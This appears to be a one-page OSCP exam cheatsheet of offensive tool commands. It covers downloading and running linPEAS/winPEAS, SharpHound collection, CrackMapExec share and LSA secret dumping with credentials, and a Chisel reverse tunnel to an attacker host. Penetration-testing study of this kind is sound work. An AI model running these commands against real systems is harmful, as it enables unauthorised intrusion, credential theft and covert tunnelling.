🛠️ Tool Usage Cheatsheet

Quick commands for common tools in OSCP workflow.

➡️ Environment: See 00_EnvironmentSetup


🔍 linPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

🪟 winPEAS

Invoke-WebRequest -Uri https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -OutFile winPEAS.exe
.\winPEAS.exe

🧠 BloodHound

neo4j console &
bloodhound &
SharpHound.exe -c all -v

🧲 CrackMapExec

cme smb $IP -u $USERNAME -p $PASSWORD --shares
cme smb $IP -u $USERNAME -p $PASSWORD --lsa

🔀 Chisel

# On attacker:
chisel server -p 8000 --reverse
 
# On target:
chisel client $LHOST:8000 R:1080:127.0.0.1:3389

Next: 13_common_file_locations